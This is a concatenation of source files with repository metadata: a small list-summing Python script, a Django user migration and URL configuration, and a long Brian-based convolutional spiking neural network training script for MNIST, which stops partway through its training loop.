80ab3312d7bbe514d1e7b3452fdd9c25d542f079
|
/collection/list/converting2.py
|
b5fb44d42103d62a6f045095b5aacbbefcdca91a
|
[] |
no_license
|
krishnanandk/kkprojects
|
2e7e993475b10696b05873a15df997ddf46931a1
|
dd5d96ad7af9f8632648e833fcae87951ca431de
|
refs/heads/master
| 2023-04-09T04:08:23.077215 | 2021-04-19T04:56:11 | 2021-04-19T04:56:11 | 359,332,372 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 94 |
py
|
# For each element, compute the sum of all the other elements.
lst = [5, 10, 20]
print(lst)
lst1 = []
total = sum(lst)  # use a new name instead of shadowing the built-in sum()
for i in lst:
    lst1.append(total - i)
print(lst1)
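# Worked example: total = 5 + 10 + 20 = 35, so each element is replaced by the
# sum of the others: [35 - 5, 35 - 10, 35 - 20] -> [30, 25, 15]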
|
[
"[email protected]"
] | |
f2744c340d84c765a7f38427e107dcf0e0339605
|
6ba72ce01fe8c08a10a7607536858cfd40b2dc16
|
/kirppuauth/migrations/0001_initial.py
|
a501f184d3eaff89282c7871370678d0bb60b7eb
|
[
"MIT"
] |
permissive
|
jlaunonen/kirppu
|
dcafc5537d325b2605daf98cdde4115a759dd2ce
|
fb694a0d1f827f4f4aae870589eb4e57ddf9bc97
|
refs/heads/master
| 2023-07-20T03:13:10.814349 | 2023-07-14T16:46:55 | 2023-07-14T16:46:55 | 18,244,187 | 0 | 6 |
MIT
| 2023-01-10T20:48:08 | 2014-03-29T15:36:30 |
Python
|
UTF-8
|
Python
| false | false | 2,830 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, max_length=30, verbose_name='username', validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username.', 'invalid')])),
('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),
('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),
('email', models.EmailField(max_length=75, verbose_name='email address', blank=True)),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('phone', models.CharField(max_length=64)),
('last_checked', models.DateTimeField(auto_now_add=True)),
('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')),
('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),
],
options={
'abstract': False,
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
bases=(models.Model,),
),
]
|
[
"[email protected]"
] | |
1f41f472eff20d97f50cfe622768cb7a07752ec7
|
ded41c1a9337c4194ef8a07951bd7c21b342f174
|
/healthillc/urls.py
|
8064a8959457eed39ec1433cd7f2e4337001ec26
|
[] |
no_license
|
rasikraj01/healthillc
|
f9a2c175245cbf50f193f7f8b4c232a55bd14980
|
b452fdcbad0e577f8160db769918689b940ae982
|
refs/heads/master
| 2022-12-10T08:19:19.656197 | 2020-02-06T18:52:18 | 2020-02-06T18:52:18 | 238,709,132 | 1 | 0 | null | 2022-11-22T05:17:46 | 2020-02-06T14:37:13 |
HTML
|
UTF-8
|
Python
| false | false | 1,780 |
py
|
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path, include
from django.contrib import admin
from django.contrib.auth.views import LoginView, LogoutView, PasswordResetView, PasswordResetDoneView, PasswordResetCompleteView, PasswordResetConfirmView
from users.views import Dashboard, Register, Plans, Checkout
from users import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
path('', include('about.urls')),
path('plans/', Plans.as_view(), name='plans'),
path('dashboard/', Dashboard.as_view(), name='dashboard'),
path('checkout', Checkout.as_view(), name='checkout'),
# path('request/', Request.as_view(), name='request'),
path('response/', views.response, name='response'),
#path('notify/', views.notification_email, name='notification_email'),
path('register/', Register.as_view(), name='register'),
path('login/', LoginView.as_view(template_name='users/login.html'), name="login"),
path('logout/', LogoutView.as_view(template_name='users/logout.html'), name="logout"),
path('password-reset/',
PasswordResetView.as_view(template_name='users/password_reset.html'),
name='password_reset'),
path('password-reset/done/',
PasswordResetDoneView.as_view(template_name='users/password_reset_done.html'),
name='password_reset_done'),
path('password-reset-confirm/<uidb64>/<token>/',
PasswordResetConfirmView.as_view(template_name='users/password_reset_confirm.html'),
name='password_reset_confirm'),
path('password-reset-complete/',
PasswordResetCompleteView.as_view(template_name='users/password_reset_complete.html'),
name='password_reset_complete')
]
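# Note: <uidb64> and <token> above are Django path converters; a request to
# e.g. /password-reset-confirm/MQ/set-password/ is dispatched to the view with
# uidb64='MQ' and token='set-password' as keyword arguments.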
|
[
"[email protected]"
] | |
595eacd1e61bf19c94b33e3e829d75688a0ceefb
|
ecb21f6dd5d49b44826974a1c06357a8405aa89e
|
/code/train/csnn_two_level_inhibition.py
|
e9cbb3ff928be0a7613608bfd7d116895e9fcef6
|
[] |
no_license
|
gumpfly/stdp-mnist
|
9924279014e66cb26fab75f1136f38fd05d8fa3e
|
03c32a47e9cd6fe8f902d134c2aa1d04bff037aa
|
refs/heads/master
| 2021-08-15T11:30:13.544379 | 2017-11-17T18:59:49 | 2017-11-17T18:59:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 55,633 |
py
|
'''
Convolutional spiking neural network training, testing, and evaluation script. Evaluation can be done outside of this script; however, it is most straightforward to call this
script with mode=train and then mode=test on HPC systems; in test mode, the network evaluation is written to disk.
'''
import warnings
warnings.filterwarnings('ignore')
import matplotlib.cm as cmap
import brian_no_units
import networkx as nx
import cPickle as p
import pandas as pd
import numpy as np
import brian as b
import argparse
import random
import timeit
import time
import math
import os
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy.spatial.distance import euclidean
from sklearn.metrics import confusion_matrix
from struct import unpack
from brian import *
from util import *
np.set_printoptions(threshold=np.nan, linewidth=200)
# only show log messages of level ERROR or higher
b.log_level_error()
# set these appropriate to your directory structure
top_level_path = os.path.join('..', '..')
MNIST_data_path = os.path.join(top_level_path, 'data')
model_name = 'csnn_two_level_inhibition'
results_path = os.path.join(top_level_path, 'results', model_name)
performance_dir = os.path.join(top_level_path, 'performance', model_name)
activity_dir = os.path.join(top_level_path, 'activity', model_name)
deltas_dir = os.path.join(top_level_path, 'deltas', model_name)
spikes_dir = os.path.join(top_level_path, 'spikes', model_name)
weights_dir = os.path.join(top_level_path, 'weights', model_name)
best_weights_dir = os.path.join(weights_dir, 'best')
end_weights_dir = os.path.join(weights_dir, 'end')
assignments_dir = os.path.join(top_level_path, 'assignments', model_name)
best_assignments_dir = os.path.join(assignments_dir, 'best')
end_assignments_dir = os.path.join(assignments_dir, 'end')
misc_dir = os.path.join(top_level_path, 'misc', model_name)
best_misc_dir = os.path.join(misc_dir, 'best')
end_misc_dir = os.path.join(misc_dir, 'end')
for d in [ performance_dir, activity_dir, weights_dir, deltas_dir, misc_dir, best_misc_dir,
assignments_dir, best_assignments_dir, MNIST_data_path, results_path,
best_weights_dir, end_weights_dir, end_misc_dir, end_assignments_dir, spikes_dir ]:
if not os.path.isdir(d):
os.makedirs(d)
def normalize_weights():
'''
Squash the input to excitatory synaptic weights to sum to a prespecified number.
'''
for conn_name in input_connections:
connection = input_connections[conn_name][:].todense()
for feature in xrange(conv_features):
feature_connection = connection[:, feature * n_e : (feature + 1) * n_e]
column_sums = np.sum(np.asarray(feature_connection), axis=0)
column_factors = weight['ee_input'] / column_sums
for n in xrange(n_e):
dense_weights = input_connections[conn_name][:, feature * n_e + n].todense()
dense_weights[convolution_locations[n]] *= column_factors[n]
input_connections[conn_name][:, feature * n_e + n] = dense_weights
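# Hedged numeric sketch of the normalization above: with the default
# conv_size = 28, weight['ee_input'] = 784 * 0.099489796 ~= 78.0, so a column
# of input weights summing to 156.0 gets column_factor 0.5 and every weight
# feeding that excitatory neuron is halved.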
def plot_input(rates):
'''
Plot the current input example during the training procedure.
'''
fig = plt.figure(fig_num, figsize = (5, 5))
im = plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary')
plt.colorbar(im)
plt.title('Current input example')
fig.canvas.draw()
return im, fig
def update_input(rates, im, fig):
'''
Update the input image to use for input plotting.
'''
im.set_array(rates.reshape((28, 28)))
fig.canvas.draw()
return im
def update_assignments_plot(assignments, im):
im.set_array(assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T)
return im
def get_2d_input_weights():
'''
Get the weights from the input to excitatory layer and reshape it to be two
dimensional and square.
'''
# specify the desired shape of the reshaped input -> excitatory weights
rearranged_weights = np.zeros((conv_features * conv_size, conv_size * n_e))
# get the input -> excitatory synaptic weights
connection = input_connections['XeAe'][:]
for n in xrange(n_e):
for feature in xrange(conv_features):
temp = connection[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)].todense()
rearranged_weights[ feature * conv_size : (feature + 1) * conv_size, n * conv_size : (n + 1) * conv_size ] = \
temp[convolution_locations[n]].reshape((conv_size, conv_size))
if n_e == 1:
ceil_sqrt = int(math.ceil(math.sqrt(conv_features)))
square_weights = np.zeros((28 * ceil_sqrt, 28 * ceil_sqrt))
for n in xrange(conv_features):
square_weights[(n // ceil_sqrt) * 28 : ((n // ceil_sqrt) + 1) * 28,
(n % ceil_sqrt) * 28 : ((n % ceil_sqrt) + 1) * 28] = rearranged_weights[n * 28 : (n + 1) * 28, :]
return square_weights.T
else:
square_weights = np.zeros((conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt * n_e_sqrt))
for n_1 in xrange(n_e_sqrt):
for n_2 in xrange(n_e_sqrt):
for f_1 in xrange(features_sqrt):
for f_2 in xrange(features_sqrt):
square_weights[conv_size * (n_2 * features_sqrt + f_2) : conv_size * (n_2 * features_sqrt + f_2 + 1), \
conv_size * (n_1 * features_sqrt + f_1) : conv_size * (n_1 * features_sqrt + f_1 + 1)] = \
rearranged_weights[(f_1 * features_sqrt + f_2) * conv_size : (f_1 * features_sqrt + f_2 + 1) * conv_size, \
(n_1 * n_e_sqrt + n_2) * conv_size : (n_1 * n_e_sqrt + n_2 + 1) * conv_size]
return square_weights.T
def get_input_weights(weight_matrix):
'''
Get the weights from the input to excitatory layer and reshape it to be two
dimensional and square.
'''
weights = []
# for each convolution feature
for feature in xrange(conv_features):
# for each excitatory neuron in this convolution feature
for n in xrange(n_e):
temp = weight_matrix[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)]
weights.append(np.ravel(temp[convolution_locations[n]]))
# return the rearranged weights to display to the user
return weights
def plot_weights_and_assignments(assignments):
'''
Plot the weights from input to excitatory layer to view during training.
'''
weights = get_2d_input_weights()
fig = plt.figure(fig_num, figsize=(18, 9))
ax1 = plt.subplot(121)
image1 = ax1.imshow(weights, interpolation='nearest', vmin=0, vmax=wmax_ee, cmap=cmap.get_cmap('hot_r'))
ax1.set_title(ending.replace('_', ' '))
ax2 = plt.subplot(122)
color = plt.get_cmap('RdBu', 11)
reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T
image2 = ax2.matshow(reshaped_assignments, cmap=color, vmin=-1.5, vmax=9.5)
ax2.set_title('Neuron labels')
divider1 = make_axes_locatable(ax1)
divider2 = make_axes_locatable(ax2)
cax1 = divider1.append_axes("right", size="5%", pad=0.05)
cax2 = divider2.append_axes("right", size="5%", pad=0.05)
plt.colorbar(image1, cax=cax1)
plt.colorbar(image2, cax=cax2, ticks=np.arange(-1, 10))
if n_e != 1:
ax1.set_xticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1))
ax1.set_yticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1))
for pos in xrange(conv_size * features_sqrt, conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt):
ax1.axhline(pos)
ax1.axvline(pos)
else:
ax1.set_xticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1))
ax1.set_yticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1))
plt.tight_layout()
fig.canvas.draw()
return fig, ax1, ax2, image1, image2
def update_weights_and_assignments(fig, ax1, ax2, im1, im2, assignments, spike_counts):
'''
Update the plot of the weights from input to excitatory layer to view during training.
'''
weights = get_2d_input_weights()
im1.set_array(weights)
reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T
im2.set_array(reshaped_assignments)
for txt in ax2.texts:
txt.set_visible(False)
spike_counts_reshaped = spike_counts.reshape([features_sqrt, features_sqrt])
for x in xrange(features_sqrt):
for y in xrange(features_sqrt):
c = spike_counts_reshaped[x, y]
if c > 0:
ax2.text(x, y, str(c), va='center', ha='center', weight='heavy', fontsize=16)
else:
ax2.text(x, y, '', va='center', ha='center')
fig.canvas.draw()
def get_current_performance(performances, current_example_num):
'''
Evaluate the performance of the network on the past 'update_interval' training
examples.
'''
global input_numbers
current_evaluation = int(current_example_num / update_interval)
	if current_example_num == num_examples - 1:
		current_evaluation += 1
start_num = current_example_num - update_interval
end_num = current_example_num
wrong_idxs = {}
wrong_labels = {}
for scheme in performances.keys():
difference = output_numbers[scheme][start_num : end_num, 0] - input_numbers[start_num : end_num]
correct = len(np.where(difference == 0)[0])
wrong_idxs[scheme] = np.where(difference != 0)[0]
wrong_labels[scheme] = output_numbers[scheme][start_num : end_num, 0][np.where(difference != 0)[0]]
performances[scheme][current_evaluation] = correct / float(update_interval) * 100
return performances, wrong_idxs, wrong_labels
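# E.g. with update_interval = 250 and 230 of the last 250 predictions matching
# the true labels, the recorded performance for that scheme is
# 230 / 250.0 * 100 = 92.0.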
def plot_performance(fig_num, performances, num_evaluations):
'''
Set up the performance plot for the beginning of the simulation.
'''
time_steps = range(0, num_evaluations)
fig = plt.figure(fig_num, figsize = (12, 4))
fig_num += 1
for performance in performances:
plt.plot(time_steps[:np.size(np.nonzero(performances[performance]))], \
np.extract(np.nonzero(performances[performance]), performances[performance]), label=performance)
lines = plt.gca().lines
plt.ylim(ymax=100)
plt.xticks(xrange(0, num_evaluations + 10, 10), xrange(0, ((num_evaluations + 10) * update_interval), 10))
plt.legend()
plt.grid(True)
plt.title('Classification performance per update interval')
fig.canvas.draw()
return lines, fig_num, fig
def update_performance_plot(lines, performances, current_example_num, fig):
'''
Update the plot of the performance based on results thus far.
'''
performances, wrong_idxs, wrong_labels = get_current_performance(performances, current_example_num)
for line, performance in zip(lines, performances):
line.set_xdata(range((current_example_num / update_interval) + 1))
line.set_ydata(performances[performance][:(current_example_num / update_interval) + 1])
fig.canvas.draw()
return lines, performances, wrong_idxs, wrong_labels
def plot_deltas(fig_num, deltas, num_weight_updates):
'''
Set up the performance plot for the beginning of the simulation.
'''
time_steps = range(0, num_weight_updates)
fig = plt.figure(fig_num, figsize = (12, 4))
fig_num += 1
plt.plot([], [], label='Absolute difference in weights')
lines = plt.gca().lines
plt.ylim(ymin=0, ymax=conv_size*n_e_total)
plt.xticks(xrange(0, num_weight_updates + weight_update_interval, 100), \
xrange(0, ((num_weight_updates + weight_update_interval) * weight_update_interval), 100))
plt.legend()
plt.grid(True)
plt.title('Absolute difference in weights per weight update interval')
fig.canvas.draw()
return lines[0], fig_num, fig
def update_deltas_plot(line, deltas, current_example_num, fig):
'''
Update the plot of the performance based on results thus far.
'''
delta = deltas[int(current_example_num / weight_update_interval)]
line.set_xdata(range(int(current_example_num / weight_update_interval) + 1))
ydata = list(line.get_ydata())
ydata.append(delta)
line.set_ydata(ydata)
fig.canvas.draw()
return line, deltas
def predict_label(assignments, spike_rates, accumulated_rates, spike_proportions):
'''
Given the label assignments of the excitatory layer and their spike rates over
the past 'update_interval', get the ranking of each of the categories of input.
'''
output_numbers = {}
for scheme in voting_schemes:
summed_rates = [0] * 10
num_assignments = [0] * 10
if scheme == 'all':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
summed_rates[i] = np.sum(spike_rates[assignments == i]) / num_assignments[i]
elif scheme == 'all_active':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
summed_rates[i] = np.sum(np.nonzero(spike_rates[assignments == i])) / num_assignments[i]
elif scheme == 'activity_neighborhood':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
for idx in np.where(assignments == i)[0]:
if np.sum(spike_rates[idx]) != 0:
neighbors = [idx]
neighbors.extend(get_neighbors(idx, features_sqrt))
summed_rates[i] += np.sum(spike_rates[neighbors]) / \
np.size(np.nonzero(spike_rates[neighbors].ravel()))
elif scheme == 'most_spiked_neighborhood':
neighborhood_activity = np.zeros([conv_features, n_e])
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
for idx in np.where(assignments == i)[0]:
if np.sum(spike_rates[idx]) != 0:
neighbors = [idx]
neighbors.extend(get_neighbors(idx, features_sqrt))
if np.size(np.nonzero(spike_rates[neighbors])) > 0:
neighborhood_activity[idx] = np.sum(spike_rates[neighbors]) / \
np.size(np.nonzero(spike_rates[neighbors].ravel()))
for n in xrange(n_e):
# find the excitatory neuron which spiked the most in this input location
most_spiked_array[np.argmax(neighborhood_activity[:, n : n + 1]), n] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'most_spiked_patch':
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for feature in xrange(conv_features):
# count up the spikes for the neurons in this convolution patch
column_sums = np.sum(spike_rates[feature : feature + 1, :], axis=0)
# find the excitatory neuron which spiked the most
most_spiked_array[feature, np.argmax(column_sums)] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'most_spiked_location':
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for n in xrange(n_e):
# find the excitatory neuron which spiked the most in this input location
most_spiked_array[np.argmax(spike_rates[:, n : n + 1]), n] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'confidence_weighting':
for i in xrange(10):
num_assignments[i] = np.count_nonzero(assignments == i)
if num_assignments[i] > 0:
summed_rates[i] = np.sum(spike_rates[assignments == i] * spike_proportions[(assignments == i).ravel(), i]) / num_assignments[i]
output_numbers[scheme] = np.argsort(summed_rates)[::-1]
return output_numbers
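# Sketch of the 'all' scheme above with hypothetical numbers: if four neurons
# are labeled 7 and together fired 20 spikes on this input, then
# summed_rates[7] = 20 / 4 = 5.0; the prediction is the argsort of these
# per-label mean rates, best label first.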
def assign_labels(result_monitor, input_numbers, accumulated_rates, accumulated_inputs):
'''
Based on the results from the previous 'update_interval', assign labels to the
excitatory neurons.
'''
for j in xrange(10):
num_assignments = len(np.where(input_numbers == j)[0])
if num_assignments > 0:
accumulated_inputs[j] += num_assignments
accumulated_rates[:, j] = accumulated_rates[:, j] * 0.9 + \
np.ravel(np.sum(result_monitor[input_numbers == j], axis=0) / num_assignments)
assignments = np.argmax(accumulated_rates, axis=1).reshape((conv_features, n_e))
spike_proportions = np.divide(accumulated_rates, np.sum(accumulated_rates, axis=0))
return assignments, accumulated_rates, spike_proportions
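# The 0.9 factor above is an exponential moving average over update intervals:
# e.g. a (neuron, label) cell with accumulated rate 10.0 and a new per-example
# mean of 2.0 is updated to 10.0 * 0.9 + 2.0 = 11.0.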
def build_network():
global fig_num, assignments
neuron_groups['e'] = b.NeuronGroup(n_e_total, neuron_eqs_e, threshold=v_thresh_e, refractory=refrac_e, reset=scr_e, compile=True, freeze=True)
neuron_groups['i'] = b.NeuronGroup(n_e_total, neuron_eqs_i, threshold=v_thresh_i, refractory=refrac_i, reset=v_reset_i, compile=True, freeze=True)
for name in population_names:
print '...Creating neuron group:', name
# get a subgroup of size 'n_e' from all exc
neuron_groups[name + 'e'] = neuron_groups['e'].subgroup(conv_features * n_e)
# get a subgroup of size 'n_i' from the inhibitory layer
neuron_groups[name + 'i'] = neuron_groups['i'].subgroup(conv_features * n_e)
# start the membrane potentials of these groups 40mV below their resting potentials
neuron_groups[name + 'e'].v = v_rest_e - 40. * b.mV
neuron_groups[name + 'i'].v = v_rest_i - 40. * b.mV
print '...Creating recurrent connections'
for name in population_names:
# if we're in test mode / using some stored weights
if test_mode:
# load up adaptive threshold parameters
if save_best_model:
neuron_groups['e'].theta = np.load(os.path.join(best_weights_dir, '_'.join(['theta_A', ending +'_best.npy'])))
else:
neuron_groups['e'].theta = np.load(os.path.join(end_weights_dir, '_'.join(['theta_A', ending +'_end.npy'])))
else:
# otherwise, set the adaptive additive threshold parameter at 20mV
neuron_groups['e'].theta = np.ones((n_e_total)) * 20.0 * b.mV
for conn_type in recurrent_conn_names:
if conn_type == 'ei':
# create connection name (composed of population and connection types)
conn_name = name + conn_type[0] + name + conn_type[1]
# create a connection from the first group in conn_name with the second group
connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0])
# instantiate the created connection
for feature in xrange(conv_features):
for n in xrange(n_e):
connections[conn_name][feature * n_e + n, feature * n_e + n] = 10.4
elif conn_type == 'ie' and not (test_no_inhibition and test_mode):
# create connection name (composed of population and connection types)
conn_name = name + conn_type[0] + name + conn_type[1]
# get weight matrix depending on training or test phase
if test_mode:
if save_best_model and not test_max_inhibition:
weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy'])))
elif test_max_inhibition:
weight_matrix = max_inhib * np.ones((n_e_total, n_e_total))
else:
weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy'])))
# create a connection from the first group in conn_name with the second group
connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0])
# define the actual synaptic connections and strengths
for feature in xrange(conv_features):
for other_feature in xrange(conv_features):
if feature != other_feature:
if n_e == 1:
x, y = feature // np.sqrt(n_e_total), feature % np.sqrt(n_e_total)
x_, y_ = other_feature // np.sqrt(n_e_total), other_feature % np.sqrt(n_e_total)
else:
x, y = feature // np.sqrt(conv_features), feature % np.sqrt(conv_features)
x_, y_ = other_feature // np.sqrt(conv_features), other_feature % np.sqrt(conv_features)
for n in xrange(n_e):
if test_mode:
connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \
weight_matrix[feature * n_e + n, other_feature * n_e + n]
else:
if inhib_scheme == 'increasing':
connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \
min(max_inhib, start_inhib * \
np.sqrt(euclidean([x, y], [x_, y_])))
elif inhib_scheme == 'eth':
connections[conn_name][feature * n_e + n, \
other_feature * n_e + n] = max_inhib
elif inhib_scheme == 'mhat':
connections[conn_name][feature * n_e + n, \
other_feature * n_e + n] = \
min(max_inhib, start_inhib * \
mhat(np.sqrt(euclidean([x, y], [x_, y_])), \
sigma=1.0, scale=1.0, shift=0.0))
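			# Hedged numeric sketch of the schemes above: with the defaults
			# start_inhib = 0.1 and max_inhib = 17.4, 'increasing' sets the lateral
			# weight to min(17.4, 0.1 * d) for map distance d, 'eth' clamps every
			# lateral weight to 17.4, and 'mhat' scales a Mexican-hat profile of d.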
print '...Creating monitors for:', name
# spike rate monitors for excitatory and inhibitory neuron populations
rate_monitors[name + 'e'] = b.PopulationRateMonitor(neuron_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second)
rate_monitors[name + 'i'] = b.PopulationRateMonitor(neuron_groups[name + 'i'], bin=(single_example_time + resting_time) / b.second)
spike_counters[name + 'e'] = b.SpikeCounter(neuron_groups[name + 'e'])
# record neuron population spikes if specified
if record_spikes and do_plot:
spike_monitors[name + 'e'] = b.SpikeMonitor(neuron_groups[name + 'e'])
spike_monitors[name + 'i'] = b.SpikeMonitor(neuron_groups[name + 'i'])
if record_spikes and do_plot:
b.figure(fig_num, figsize=(8, 6))
fig_num += 1
b.ion()
b.subplot(211)
b.raster_plot(spike_monitors['Ae'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Excitatory spikes per neuron')
b.subplot(212)
b.raster_plot(spike_monitors['Ai'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Inhibitory spikes per neuron')
b.tight_layout()
	# creating Poisson spike train from input image (784 vector, 28x28 image)
for name in input_population_names:
input_groups[name + 'e'] = b.PoissonGroup(n_input, 0)
rate_monitors[name + 'e'] = b.PopulationRateMonitor(input_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second)
# creating connections from input Poisson spike train to excitatory neuron population(s)
for name in input_connection_names:
print '\n...Creating connections between', name[0], 'and', name[1]
# for each of the input connection types (in this case, excitatory -> excitatory)
for conn_type in input_conn_names:
# saved connection name
conn_name = name[0] + conn_type[0] + name[1] + conn_type[1]
# get weight matrix depending on training or test phase
if test_mode:
if save_best_model:
weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy'])))
else:
weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy'])))
# create connections from the windows of the input group to the neuron population
input_connections[conn_name] = b.Connection(input_groups['Xe'], neuron_groups[name[1] + conn_type[1]], \
structure='sparse', state='g' + conn_type[0], delay=True, max_delay=delay[conn_type][1])
if test_mode:
for feature in xrange(conv_features):
for n in xrange(n_e):
for idx in xrange(conv_size ** 2):
input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = \
weight_matrix[convolution_locations[n][idx], feature * n_e + n]
else:
for feature in xrange(conv_features):
for n in xrange(n_e):
for idx in xrange(conv_size ** 2):
input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = (b.random() + 0.01) * 0.3
if test_mode:
if do_plot:
plot_weights_and_assignments(assignments)
fig_num += 1
# if excitatory -> excitatory STDP is specified, add it here (input to excitatory populations)
if not test_mode:
print '...Creating STDP for connection', name
# STDP connection name
conn_name = name[0] + conn_type[0] + name[1] + conn_type[1]
# create the STDP object
stdp_methods[conn_name] = b.STDP(input_connections[conn_name], eqs=eqs_stdp_ee, \
pre=eqs_stdp_pre_ee, post=eqs_stdp_post_ee, wmin=0., wmax=wmax_ee)
print '\n'
def run_train():
global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \
simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \
accumulated_inputs, spike_proportions
if do_plot:
input_image_monitor, input_image = plot_input(rates)
fig_num += 1
weights_assignments_figure, weights_axes, assignments_axes, weights_image, \
assignments_image = plot_weights_and_assignments(assignments)
fig_num += 1
# set up performance recording and plotting
num_evaluations = int(num_examples / update_interval) + 1
performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes }
num_weight_updates = int(num_examples / weight_update_interval)
all_deltas = np.zeros((num_weight_updates, n_e_total))
deltas = np.zeros(num_weight_updates)
if do_plot:
performance_monitor, fig_num, fig_performance = plot_performance(fig_num, performances, num_evaluations)
line, fig_num, deltas_figure = plot_deltas(fig_num, deltas, num_weight_updates)
if plot_all_deltas:
lines, fig_num, all_deltas_figure = plot_all_deltas(fig_num, all_deltas, num_weight_updates)
else:
performances, wrong_idxs, wrong_labels = get_current_performance(performances, 0)
# initialize network
j = 0
num_retries = 0
b.run(0)
if save_best_model:
best_performance = 0.0
# start recording time
start_time = timeit.default_timer()
last_weights = input_connections['XeAe'][:].todense()
current_inhib = start_inhib
while j < num_examples:
# get the firing rates of the next input example
rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity * \
((noise_const * np.random.randn(n_input_sqrt, n_input_sqrt)) + 1.0)
# sets the input firing rates
input_groups['Xe'].rate = rates.reshape(n_input)
